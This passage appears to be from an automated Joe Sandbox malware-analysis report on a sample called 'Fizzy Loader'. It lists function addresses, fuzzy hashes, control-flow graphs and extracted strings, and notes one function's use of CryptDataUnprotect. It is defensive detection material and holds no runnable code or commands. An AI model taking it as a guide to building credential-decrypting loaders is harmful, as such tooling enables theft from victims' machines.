                                                                                                                                                            • Opcode Fuzzy Hash: a9189f649a9e4ab096c07d3d2deff4ee5abb4673ad4e54486356d69bc659de37
                                                                                                                                                            • Instruction Fuzzy Hash: 03C1C331F1C9599FE7A8FB2C985A6F977E1FF98350F04017AD04DC7292DE28A8418B81
                                                                                                                                                            Function 00007FF848F5E818 Relevance: 4.8, Strings: 3, Instructions: 1043COMMON
                                                                                                                                                            Download Yara Rule

                                                                                                                                                            Control-flow Graph

                                                                                                                                                            • Executed
                                                                                                                                                            • Not Executed
                                                                                                                                                            control_flow_graph 1679 7ff848f5e818-7ff848f9fa61 1683 7ff848f9fa63 1679->1683 1684 7ff848f9fa64-7ff848f9fa69 1679->1684 1683->1684 1685 7ff848f9fa73-7ff848f9fa7d 1684->1685 1686 7ff848f9fa6b 1684->1686 1687 7ff848f9fa6d-7ff848f9fa71 1686->1687 1688 7ff848f9fa7e-7ff848f9fb05 1686->1688 1687->1685 1695 7ff848f9fb07 1688->1695 1696 7ff848f9fb08-7ff848f9fb3b 1688->1696 1695->1696 1701 7ff848f9fb85-7ff848f9fc95 call 7ff848f9e100 * 3 1696->1701 1702 7ff848f9fb3d-7ff848f9fb59 1696->1702 1721 7ff848f9fc97 1701->1721 1722 7ff848f9fc98-7ff848f9fce8 1701->1722 1706 7ff848f9fb5b 1702->1706 1707 7ff848f9fb5c-7ff848f9fb84 1702->1707 1706->1707 1707->1701 1721->1722 1728 7ff848fa4975-7ff848fa4985 1722->1728 1729 7ff848f9fcee-7ff848f9fd4a call 7ff848f9cfc0 1722->1729 1733 7ff848fa4987 1728->1733 1734 7ff848fa4988-7ff848fa49b7 1728->1734 1735 7ff848f9fd4f-7ff848f9fd8c 1729->1735 1733->1734 1735->1728 1740 7ff848f9fd92-7ff848f9fe38 call 7ff848f9cfc0 1735->1740 1748 7ff848f9fe3a-7ff848f9fe7c 1740->1748 1749 7ff848f9fe7f-7ff848f9ffb9 call 7ff848f9cfc0 * 2 1740->1749 1748->1749 1768 7ff848f9ffe0-7ff848fa0678 call 7ff848f9cfc0 * 10 1749->1768 1769 7ff848f9ffbb-7ff848f9ffdf 1749->1769 1768->1728 1769->1768
                                                                                                                                                            Strings
                                                                                                                                                            Memory Dump Source
                                                                                                                                                            • Source File: 00000000.00000002.2726953792.00007FF848F40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F40000, based on PE: false
                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                            • Snapshot File: hcaresult_0_2_7ff848f40000_Fizzy Loader.jbxd
                                                                                                                                                            Similarity
                                                                                                                                                            • API ID:
                                                                                                                                                            • String ID: +$BR_H$m
                                                                                                                                                            • API String ID: 0-3582178533
                                                                                                                                                            • Opcode ID: 9d062e40978b4e174af688c42b711a3a3f493e7c5bf5c9564125e97d7c2229ad
                                                                                                                                                            • Instruction ID: 8d42b18c7105b615879be04c5cd433085b7bcbb815d1202f4ab2f451f978a081
                                                                                                                                                            • Opcode Fuzzy Hash: 9d062e40978b4e174af688c42b711a3a3f493e7c5bf5c9564125e97d7c2229ad
                                                                                                                                                            • Instruction Fuzzy Hash: 6B829AB0E18A499FE799EB18D8547A9B7E1FF98358F1001BDE14DD32C2CF3859818B06
                                                                                                                                                            Function 00007FF849108456 Relevance: 3.9, Strings: 1, Instructions: 2659COMMON
                                                                                                                                                            Download Yara Rule
                                                                                                                                                            Strings
                                                                                                                                                            Memory Dump Source
                                                                                                                                                            • Source File: 00000000.00000002.2734670778.00007FF849100000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF849100000, based on PE: false
                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                            • Snapshot File: hcaresult_0_2_7ff849100000_Fizzy Loader.jbxd
                                                                                                                                                            Similarity
                                                                                                                                                            • API ID:
                                                                                                                                                            • String ID: A
                                                                                                                                                            • API String ID: 0-3554254475
                                                                                                                                                            • Opcode ID: a6e398af9b1d4b30ad725e857be10011606535c7068e0af78a41d61c598aed6c
                                                                                                                                                            • Instruction ID: 77e059058ffadc0a2169fb4cbe95708b3d11daf37ea2043ff20ce88f48299977
                                                                                                                                                            • Opcode Fuzzy Hash: a6e398af9b1d4b30ad725e857be10011606535c7068e0af78a41d61c598aed6c
                                                                                                                                                            • Instruction Fuzzy Hash: D823F57091D7C58FD33A9F2484426A67BE0FF96344F1445FEC48E8B593EA3A6406CB92
                                                                                                                                                            Function 00007FF849116521 Relevance: 3.1, Strings: 1, Instructions: 1878COMMON
                                                                                                                                                            Download Yara Rule
                                                                                                                                                            Strings
                                                                                                                                                            Memory Dump Source
                                                                                                                                                            • Source File: 00000000.00000002.2734670778.00007FF849100000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF849100000, based on PE: false
                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                            • Snapshot File: hcaresult_0_2_7ff849100000_Fizzy Loader.jbxd
                                                                                                                                                            Similarity
                                                                                                                                                            • API ID:
                                                                                                                                                            • String ID: r
                                                                                                                                                            • API String ID: 0-1812594589
                                                                                                                                                            • Opcode ID: ef3986066dcbee7e9889083e71fa4b1edd1e7a4d6c30ad015ed7496e06acbd1f
                                                                                                                                                            • Instruction ID: fd4915e027f07da87a4d7605841016ee06f16347edf090b23c3ae05e7491cb6d
                                                                                                                                                            • Opcode Fuzzy Hash: ef3986066dcbee7e9889083e71fa4b1edd1e7a4d6c30ad015ed7496e06acbd1f
                                                                                                                                                            • Instruction Fuzzy Hash: 8CD21271A0DA865FE75DEB28945A6747BE1EF5A384B0400FEC04ADB2E3ED2D6C05CB41
                                                                                                                                                            Function 00007FF848F8B810 Relevance: 3.1, Strings: 2, Instructions: 579COMMON
                                                                                                                                                            Download Yara Rule
                                                                                                                                                            Strings
                                                                                                                                                            Memory Dump Source
                                                                                                                                                            • Source File: 00000000.00000002.2726953792.00007FF848F40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F40000, based on PE: false
                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                            • Snapshot File: hcaresult_0_2_7ff848f40000_Fizzy Loader.jbxd
                                                                                                                                                            Similarity
                                                                                                                                                            • API ID:
                                                                                                                                                            • String ID: HG_H$xI
                                                                                                                                                            • API String ID: 0-663151228
                                                                                                                                                            • Opcode ID: 229d6d945da2dd7b2e547dd680e737ea775bb278100bec1c47ebb2cf21949731
                                                                                                                                                            • Instruction ID: aeccdadec47a3b4c3abe23655c18ec3c0a75e2ebce56cbabc53756776953344a
                                                                                                                                                            • Opcode Fuzzy Hash: 229d6d945da2dd7b2e547dd680e737ea775bb278100bec1c47ebb2cf21949731
                                                                                                                                                            • Instruction Fuzzy Hash: DC12A370A1CB864FE7B8EB189459A7AB7D1FF95350F10467EC48DC3292DF34A8428786
                                                                                                                                                            Function 00007FF84910B44E Relevance: 3.0, Strings: 1, Instructions: 1736COMMON
                                                                                                                                                            Download Yara Rule
                                                                                                                                                            Strings
                                                                                                                                                            Memory Dump Source
                                                                                                                                                            • Source File: 00000000.00000002.2734670778.00007FF849100000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF849100000, based on PE: false
                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                            • Snapshot File: hcaresult_0_2_7ff849100000_Fizzy Loader.jbxd
                                                                                                                                                            Similarity
                                                                                                                                                            • API ID:
                                                                                                                                                            • String ID: n/_H
                                                                                                                                                            • API String ID: 0-2357778120
                                                                                                                                                            • Opcode ID: fe3afe4c50397c72c15ec13e8e101059a659823523c3e79ce4d5633763ad3fe1
                                                                                                                                                            • Instruction ID: dce7ae7298f90333964d3f9ba98e2117eaa512061b2a6b35043fb14f3eaf5086
                                                                                                                                                            • Opcode Fuzzy Hash: fe3afe4c50397c72c15ec13e8e101059a659823523c3e79ce4d5633763ad3fe1
                                                                                                                                                            • Instruction Fuzzy Hash: E4D2293090EAC94FDB69EF688815AA97BE1FF4A344F0401FED04DDB293DE296845CB51
                                                                                                                                                            Function 00007FF8491005F5 Relevance: 2.2, Strings: 1, Instructions: 968COMMON
                                                                                                                                                            Download Yara Rule
                                                                                                                                                            Strings
                                                                                                                                                            Memory Dump Source
                                                                                                                                                            • Source File: 00000000.00000002.2734670778.00007FF849100000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF849100000, based on PE: false
                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                            • Snapshot File: hcaresult_0_2_7ff849100000_Fizzy Loader.jbxd
                                                                                                                                                            Similarity
                                                                                                                                                            • API ID:
                                                                                                                                                            • String ID: H
                                                                                                                                                            • API String ID: 0-2852464175
                                                                                                                                                            • Opcode ID: 7464c065f6cecb190749bc2b0cf6b705f68e08065e04f745e1af1053a8455d22
                                                                                                                                                            • Instruction ID: 15b3b80c0b4a66ff684f6fb386c69dd7eabb27d2c5080cac436d09315bb504ad
                                                                                                                                                            • Opcode Fuzzy Hash: 7464c065f6cecb190749bc2b0cf6b705f68e08065e04f745e1af1053a8455d22
                                                                                                                                                            • Instruction Fuzzy Hash: 84620530A0DBC64FE766EB288825A747BE1FF56354B4901FAD04ACB5E3EE19AC41C741
                                                                                                                                                            Function 00007FF848F59AC0 Relevance: 2.2, Strings: 1, Instructions: 902COMMON
                                                                                                                                                            Download Yara Rule
                                                                                                                                                            Strings
                                                                                                                                                            Memory Dump Source
                                                                                                                                                            • Source File: 00000000.00000002.2726953792.00007FF848F40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F40000, based on PE: false
                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                            • Snapshot File: hcaresult_0_2_7ff848f40000_Fizzy Loader.jbxd
                                                                                                                                                            Similarity
                                                                                                                                                            • API ID:
                                                                                                                                                            • String ID: xKI
                                                                                                                                                            • API String ID: 0-1236185655
                                                                                                                                                            • Opcode ID: 7506b3a4459f814a436865395acaab2d545a23f78edc13ad6bca495d4557acbb
                                                                                                                                                            • Instruction ID: bb8489d8211a0fdadd861c3b665b99bbe83851a834f8da1e2dde09e6b14fd2a8
                                                                                                                                                            • Opcode Fuzzy Hash: 7506b3a4459f814a436865395acaab2d545a23f78edc13ad6bca495d4557acbb
                                                                                                                                                            • Instruction Fuzzy Hash: 67627E30A1CA4A8FDB98EB2CC455AA977E1FF99344F1441B9C04ED72A6DF35E842CB44
                                                                                                                                                            Function 00007FF848F5EEC8 Relevance: 2.0, Strings: 1, Instructions: 747COMMON
                                                                                                                                                            Download Yara Rule
                                                                                                                                                            Strings
                                                                                                                                                            Memory Dump Source
                                                                                                                                                            • Source File: 00000000.00000002.2726953792.00007FF848F40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F40000, based on PE: false
                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                            • Snapshot File: hcaresult_0_2_7ff848f40000_Fizzy Loader.jbxd
                                                                                                                                                            Similarity
                                                                                                                                                            • API ID:
                                                                                                                                                            • String ID: _
                                                                                                                                                            • API String ID: 0-701932520
                                                                                                                                                            • Opcode ID: 7179b55c1df940d8539446637a4e6b3b516221aef3f438c8b67dffb76f19b5de
                                                                                                                                                            • Instruction ID: 75f9f36fda293cf42f2bccc6bd6aca3ccfdacb2f12a9d075339aa37a783d5a00
                                                                                                                                                            • Opcode Fuzzy Hash: 7179b55c1df940d8539446637a4e6b3b516221aef3f438c8b67dffb76f19b5de
                                                                                                                                                            • Instruction Fuzzy Hash: 5922E631E1CA464FE798FB289416AB973D1FF98790F54057ED04EC72C3DF28A8468689
                                                                                                                                                            Function 00007FF848F47228 Relevance: 1.8, Strings: 1, Instructions: 517COMMON
                                                                                                                                                            Download Yara Rule
                                                                                                                                                            Strings
                                                                                                                                                            Memory Dump Source
                                                                                                                                                            • Source File: 00000000.00000002.2726953792.00007FF848F40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F40000, based on PE: false
                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                            • Snapshot File: hcaresult_0_2_7ff848f40000_Fizzy Loader.jbxd
                                                                                                                                                            Similarity
                                                                                                                                                            • API ID:
                                                                                                                                                            • String ID: aH
                                                                                                                                                            • API String ID: 0-2191227055
                                                                                                                                                            • Opcode ID: 65fe020afe7eb18487becf6f5408286699f47e2da930e63d6eda58bd02ab3712
                                                                                                                                                            • Instruction ID: 1be6ac4e9de494248f36441a3af9270ecb64192ad85ac46d5581c0876b06bcff
                                                                                                                                                            • Opcode Fuzzy Hash: 65fe020afe7eb18487becf6f5408286699f47e2da930e63d6eda58bd02ab3712
                                                                                                                                                            • Instruction Fuzzy Hash: 7CF1283190DA8A4FDB55FF288855AEABBE1FF95350F0406BAD44DC71D7CE38A8068780
                                                                                                                                                            Function 00007FF8491036AE Relevance: 1.7, APIs: 1, Instructions: 227encryptionCOMMON
                                                                                                                                                            Download Yara Rule
                                                                                                                                                            APIs
                                                                                                                                                            Memory Dump Source
                                                                                                                                                            • Source File: 00000000.00000002.2734670778.00007FF849100000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF849100000, based on PE: false
                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                            • Snapshot File: hcaresult_0_2_7ff849100000_Fizzy Loader.jbxd
                                                                                                                                                            Similarity
                                                                                                                                                            • API ID: CryptDataUnprotect
                                                                                                                                                            • String ID:
                                                                                                                                                            • API String ID: 834300711-0
                                                                                                                                                            • Opcode ID: d205d2c0bc392423385b3d093a20b10a15fbba91c8fb79d712dcfbea65aeb4d5
                                                                                                                                                            • Instruction ID: 68a0a09253730cdd750afa0fab246d5e404a3a026e7a53dceaa7e17e5cafb4e6
                                                                                                                                                            • Opcode Fuzzy Hash: d205d2c0bc392423385b3d093a20b10a15fbba91c8fb79d712dcfbea65aeb4d5
                                                                                                                                                            • Instruction Fuzzy Hash: 95511D3091DA889FD758EB2C98056B97BE0FF95750F0441BFE44DC3283DE28A845C782
                                                                                                                                                            Function 00007FF848F5F1D0 Relevance: 1.4, Instructions: 1360COMMON
                                                                                                                                                            Download Yara Rule
                                                                                                                                                            Memory Dump Source
                                                                                                                                                            • Source File: 00000000.00000002.2726953792.00007FF848F40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F40000, based on PE: false
                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                            • Snapshot File: hcaresult_0_2_7ff848f40000_Fizzy Loader.jbxd
                                                                                                                                                            Similarity
                                                                                                                                                            • API ID:
                                                                                                                                                            • String ID:
                                                                                                                                                            • API String ID:
                                                                                                                                                            • Opcode ID: e4119b134fdd3128613ab54fa60c5fbe988afb7d37e1c822a975805e330c12c2
                                                                                                                                                            • Instruction ID: 693be315609b2720f725194db2bcbd68213b460034aa656826995531e7047088
                                                                                                                                                            • Opcode Fuzzy Hash: e4119b134fdd3128613ab54fa60c5fbe988afb7d37e1c822a975805e330c12c2
                                                                                                                                                            • Instruction Fuzzy Hash: C2A23170A1CA468FD7A8EB18C495BAAB7E1FFA8344F10457DD04EC7296DF34A881CB45
                                                                                                                                                            Function 00007FF849118922 Relevance: 1.4, Instructions: 1353COMMON
                                                                                                                                                            Download Yara Rule
                                                                                                                                                            Memory Dump Source
                                                                                                                                                            • Source File: 00000000.00000002.2734670778.00007FF849100000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF849100000, based on PE: false
                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                            • Snapshot File: hcaresult_0_2_7ff849100000_Fizzy Loader.jbxd
                                                                                                                                                            Similarity
                                                                                                                                                            • API ID:
                                                                                                                                                            • String ID:
                                                                                                                                                            • API String ID:
                                                                                                                                                            • Opcode ID: af2292885469117a2a999174943fdd29e4620129a4bb15b3c2ce17efb618c611
                                                                                                                                                            • Instruction ID: 2285d9680ae805a3de4c29307fb7455b84b828ec110ec07bd70857fb353e889d
                                                                                                                                                            • Opcode Fuzzy Hash: af2292885469117a2a999174943fdd29e4620129a4bb15b3c2ce17efb618c611
                                                                                                                                                            • Instruction Fuzzy Hash: 02B27030A09A4A8FDB98FF28C455AA977A1FF58354F5005B9D41ECB2D6DF39E842CB40
                                                                                                                                                            Function 00007FF848F4E072 Relevance: 1.0, Instructions: 1042COMMON
                                                                                                                                                            Download Yara Rule
                                                                                                                                                            Memory Dump Source
                                                                                                                                                            • Source File: 00000000.00000002.2726953792.00007FF848F40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F40000, based on PE: false
                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                            • Snapshot File: hcaresult_0_2_7ff848f40000_Fizzy Loader.jbxd
                                                                                                                                                            Similarity
                                                                                                                                                            • API ID:
                                                                                                                                                            • String ID:
                                                                                                                                                            • API String ID:
                                                                                                                                                            • Opcode ID: e7d0fbe4a44a228f4be21b33442a650621ec9045d89c14cb35db083d88bbaa6a
                                                                                                                                                            • Instruction ID: fac33553a8ef43e9d9e307501f340c6f645299aaf383fe89a8bff8433222aac6
                                                                                                                                                            • Opcode Fuzzy Hash: e7d0fbe4a44a228f4be21b33442a650621ec9045d89c14cb35db083d88bbaa6a
                                                                                                                                                            • Instruction Fuzzy Hash: 06720630E1EA894FDB4DEB688815AA97BE1FF59790F5005BED00DDB2D3CE28A805C715
                                                                                                                                                            Function 00007FF849103CD4 Relevance: .9, Instructions: 870COMMON
                                                                                                                                                            Download Yara Rule
                                                                                                                                                            Memory Dump Source
                                                                                                                                                            • Source File: 00000000.00000002.2734670778.00007FF849100000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF849100000, based on PE: false
                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                            • Snapshot File: hcaresult_0_2_7ff849100000_Fizzy Loader.jbxd
                                                                                                                                                            Similarity
                                                                                                                                                            • API ID:
                                                                                                                                                            • String ID:
                                                                                                                                                            • API String ID:
                                                                                                                                                            • Opcode ID: 9112ef2fc915c5d0e29970b2d00b45733dbb2d983ce67c6588c35ab5768346a3
                                                                                                                                                            • Instruction ID: 4546ef7d931d74f50cde68e0d9cc20cc2896a092c6feac6d31cd1603af1ec9fb
                                                                                                                                                            • Opcode Fuzzy Hash: 9112ef2fc915c5d0e29970b2d00b45733dbb2d983ce67c6588c35ab5768346a3
                                                                                                                                                            • Instruction Fuzzy Hash: 5162B57191D3C64FD739AF1484566E97BE0EF96344F0406BEC48EC76E2EE39601A8B42
                                                                                                                                                            Function 00007FF848F5F1A8 Relevance: .9, Instructions: 862COMMON
                                                                                                                                                            Download Yara Rule
                                                                                                                                                            Memory Dump Source
                                                                                                                                                            • Source File: 00000000.00000002.2726953792.00007FF848F40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F40000, based on PE: false
                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                            • Snapshot File: hcaresult_0_2_7ff848f40000_Fizzy Loader.jbxd
                                                                                                                                                            Similarity
                                                                                                                                                            • API ID:
                                                                                                                                                            • String ID:
                                                                                                                                                            • API String ID:
                                                                                                                                                            • Opcode ID: b006b0d857916598fc42604aa999ee68ce3bdc14622ed1183e2d7e3b1e1891ab
                                                                                                                                                            • Instruction ID: b42b1a105af28382f6d739a7398bb1715432c3c4d8de979dea79cc3f8ab5f657
                                                                                                                                                            • Opcode Fuzzy Hash: b006b0d857916598fc42604aa999ee68ce3bdc14622ed1183e2d7e3b1e1891ab
                                                                                                                                                            • Instruction Fuzzy Hash: 1142CE31B0CA0A8FEB99EB28905567573E2FF98394F1505BDD04EC76C2DF29A842C785
                                                                                                                                                            Function 00007FF848F55848 Relevance: .7, Instructions: 663COMMON
                                                                                                                                                            Download Yara Rule
                                                                                                                                                            Memory Dump Source
                                                                                                                                                            • Source File: 00000000.00000002.2726953792.00007FF848F40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F40000, based on PE: false
                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                            • Snapshot File: hcaresult_0_2_7ff848f40000_Fizzy Loader.jbxd
                                                                                                                                                            Similarity
                                                                                                                                                            • API ID:
                                                                                                                                                            • String ID:
                                                                                                                                                            • API String ID:
                                                                                                                                                            • Opcode ID: f39ef969ed3a7583befc410c837ffc5f9efb9d72ec156992a292ccebac97d4c1
                                                                                                                                                            • Instruction ID: 73fea37d0f7a46ad757edbacbce7f56828fd757f402af03f8fd6a0fc85d15ac5
                                                                                                                                                            • Opcode Fuzzy Hash: f39ef969ed3a7583befc410c837ffc5f9efb9d72ec156992a292ccebac97d4c1
                                                                                                                                                            • Instruction Fuzzy Hash: CB22E530A1DA4A4FE78CEF2C845967AB7E1FF99340F5445BED00AC72D7CE28A8428744
                                                                                                                                                            Function 00007FF84910F169 Relevance: .7, Instructions: 655COMMON
                                                                                                                                                            Download Yara Rule
                                                                                                                                                            Memory Dump Source
                                                                                                                                                            • Source File: 00000000.00000002.2734670778.00007FF849100000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF849100000, based on PE: false
                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                            • Snapshot File: hcaresult_0_2_7ff849100000_Fizzy Loader.jbxd
                                                                                                                                                            Similarity
                                                                                                                                                            • API ID:
                                                                                                                                                            • String ID:
                                                                                                                                                            • API String ID:
                                                                                                                                                            • Opcode ID: 72e5cbd7bfead66ab0fd7cc35ba80939aae2fdd54b5f7a3300527074e568f883
                                                                                                                                                            • Instruction ID: 343630fad18ceca417d30c1a50ac1229e9417edd6138925e3086d6033fd0ae38
                                                                                                                                                            • Opcode Fuzzy Hash: 72e5cbd7bfead66ab0fd7cc35ba80939aae2fdd54b5f7a3300527074e568f883
                                                                                                                                                            • Instruction Fuzzy Hash: EA221830A0CA8D8FDB54EF28C4566AA77E1FF49340F1442B9D44DC7692DE3DA846CB81
                                                                                                                                                            Function 00007FF848F53218 Relevance: .6, Instructions: 600COMMON
                                                                                                                                                            Download Yara Rule
                                                                                                                                                            Memory Dump Source
                                                                                                                                                            • Source File: 00000000.00000002.2726953792.00007FF848F40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F40000, based on PE: false
                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                            • Snapshot File: hcaresult_0_2_7ff848f40000_Fizzy Loader.jbxd
                                                                                                                                                            Similarity
                                                                                                                                                            • API ID:
                                                                                                                                                            • String ID:
                                                                                                                                                            • API String ID:
                                                                                                                                                            • Opcode ID: 2c1e6f5a6400a4c1df4964bd16aa98e1b9575d2ab897d8a694cd900a5cb9e396
                                                                                                                                                            • Instruction ID: b5adc2b2ac6b00451f09aaf825da812391e780d7d586f1458e4aa95c2d96ba68
                                                                                                                                                            • Opcode Fuzzy Hash: 2c1e6f5a6400a4c1df4964bd16aa98e1b9575d2ab897d8a694cd900a5cb9e396
                                                                                                                                                            • Instruction Fuzzy Hash: FE12A270A0DA5A8FD78CEF288459679B7E1FFA9340F1441BED00AD72D7DE28A841C745
                                                                                                                                                            Function 00007FF84910C2A5 Relevance: .5, Instructions: 527COMMON
                                                                                                                                                            Download Yara Rule
                                                                                                                                                            Memory Dump Source
                                                                                                                                                            • Source File: 00000000.00000002.2734670778.00007FF849100000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF849100000, based on PE: false
                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                            • Snapshot File: hcaresult_0_2_7ff849100000_Fizzy Loader.jbxd
                                                                                                                                                            Similarity
                                                                                                                                                            • API ID:
                                                                                                                                                            • String ID:
                                                                                                                                                            • API String ID:
                                                                                                                                                            • Opcode ID: 3cbe13bd992fb504687d608d11b2deb31cbe809a1f92d7c5fff770714f2cb947
                                                                                                                                                            • Instruction ID: cdcc3cd22a6895896f1e92aa22b51a26c190afebc6f981fb9b5c842378a0c4bf
                                                                                                                                                            • Opcode Fuzzy Hash: 3cbe13bd992fb504687d608d11b2deb31cbe809a1f92d7c5fff770714f2cb947
                                                                                                                                                            • Instruction Fuzzy Hash: 5CF1163190DACA8FEB65EF2888506B67BE1FF95350F0401BAD05DC75C2EE2DA816CB41
                                                                                                                                                            Function 00007FF848F5E3D9 Relevance: .3, Instructions: 342COMMON
                                                                                                                                                            Download Yara Rule
                                                                                                                                                            Memory Dump Source
                                                                                                                                                            • Source File: 00000000.00000002.2726953792.00007FF848F40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F40000, based on PE: false
                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                            • Snapshot File: hcaresult_0_2_7ff848f40000_Fizzy Loader.jbxd
                                                                                                                                                            Similarity
                                                                                                                                                            • API ID:
                                                                                                                                                            • String ID:
                                                                                                                                                            • API String ID:
                                                                                                                                                            • Opcode ID: e73d0d4739096c26a2230837dc715fe9c38e4876dcf3da8b55f182a4381955b9
                                                                                                                                                            • Instruction ID: 3911b1a75fccfd767d740cc24834584adbf9e62078a445b6853aa7786ca57e24
                                                                                                                                                            • Opcode Fuzzy Hash: e73d0d4739096c26a2230837dc715fe9c38e4876dcf3da8b55f182a4381955b9
                                                                                                                                                            • Instruction Fuzzy Hash: E6B11671D1E6CA0FE756E77888155E5BFE1EF46390F0801FBD488CB0D3EA28681A8756
                                                                                                                                                            Function 00007FF8491146CA Relevance: .3, Instructions: 328COMMON
                                                                                                                                                            Download Yara Rule
                                                                                                                                                            Memory Dump Source
                                                                                                                                                            • Source File: 00000000.00000002.2734670778.00007FF849100000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF849100000, based on PE: false
                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                            • Snapshot File: hcaresult_0_2_7ff849100000_Fizzy Loader.jbxd
                                                                                                                                                            Similarity
                                                                                                                                                            • API ID:
                                                                                                                                                            • String ID:
                                                                                                                                                            • API String ID:
                                                                                                                                                            • Opcode ID: fb5e9a1a6ed766d77bb8059d722f135f37f4f19c00a70953c688a3b06f92af19
                                                                                                                                                            • Instruction ID: a2a95114d6446a8ce7d641e0f6f0317468006c485cff1d5db872e64b981d5c5a
                                                                                                                                                            • Opcode Fuzzy Hash: fb5e9a1a6ed766d77bb8059d722f135f37f4f19c00a70953c688a3b06f92af19
                                                                                                                                                            • Instruction Fuzzy Hash: A2B10720A0CAC51FE765EF28C4526BAB7D1EF89790F04067ED09EC76D7ED2CA8468741
                                                                                                                                                            Function 00007FF848F49AB4 Relevance: 8.3, Strings: 5, Instructions: 2014COMMON
                                                                                                                                                            Download Yara Rule
                                                                                                                                                            Strings
                                                                                                                                                            Memory Dump Source
                                                                                                                                                            • Source File: 00000000.00000002.2726953792.00007FF848F40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F40000, based on PE: false
                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                            • Snapshot File: hcaresult_0_2_7ff848f40000_Fizzy Loader.jbxd
                                                                                                                                                            Similarity
                                                                                                                                                            • API ID:
                                                                                                                                                            • String ID: h}H$h}H$h}H$h}H$aH
                                                                                                                                                            • API String ID: 0-687939070
                                                                                                                                                            • Opcode ID: b83edc8b2c72c5ea02d103805f566c0f06568f581c7fefa642719251d12fc9f8
                                                                                                                                                            • Instruction ID: bfcf994a2519eaf68726a374142a4b37f91008cecfc017c50ccf5051c7e7aee6
                                                                                                                                                            • Opcode Fuzzy Hash: b83edc8b2c72c5ea02d103805f566c0f06568f581c7fefa642719251d12fc9f8
                                                                                                                                                            • Instruction Fuzzy Hash: C6E2C130A1EA4E8FEB85EB28C455BAA77E1FF68740F1445BAD009D72D6DF38A841C741
                                                                                                                                                            Function 00007FF848F40E30 Relevance: 5.3, Strings: 4, Instructions: 342COMMON
                                                                                                                                                            Download Yara Rule

                                                                                                                                                            Control-flow Graph

                                                                                                                                                            Strings
                                                                                                                                                            Memory Dump Source
                                                                                                                                                            • Source File: 00000000.00000002.2726953792.00007FF848F40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F40000, based on PE: false
                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                            • Snapshot File: hcaresult_0_2_7ff848f40000_Fizzy Loader.jbxd
                                                                                                                                                            Similarity
                                                                                                                                                            • API ID:
                                                                                                                                                            • String ID: HAH$HAH$HAH$yR_H
                                                                                                                                                            • API String ID: 0-1148780016
                                                                                                                                                            • Opcode ID: ea7c458c58bbb8fca017220ca4f80eb632a26ba5a36ff4c7c8b8536e99311cc7
                                                                                                                                                            • Instruction ID: a38d9d582711025f8ce12b7ae7b704dd7fc390a5fad7429f00ff39403e67e605
                                                                                                                                                            • Opcode Fuzzy Hash: ea7c458c58bbb8fca017220ca4f80eb632a26ba5a36ff4c7c8b8536e99311cc7
                                                                                                                                                            • Instruction Fuzzy Hash: 1CA1E631E1CA494FE795EB6C98456B9B7E1FFA9790F00027AD04EE3286DF346C828745
                                                                                                                                                            Function 00007FF848F59A6F Relevance: 4.8, Strings: 3, Instructions: 1060COMMON
                                                                                                                                                            Download Yara Rule

                                                                                                                                                            Control-flow Graph

                                                                                                                                                            • Executed
                                                                                                                                                            • Not Executed
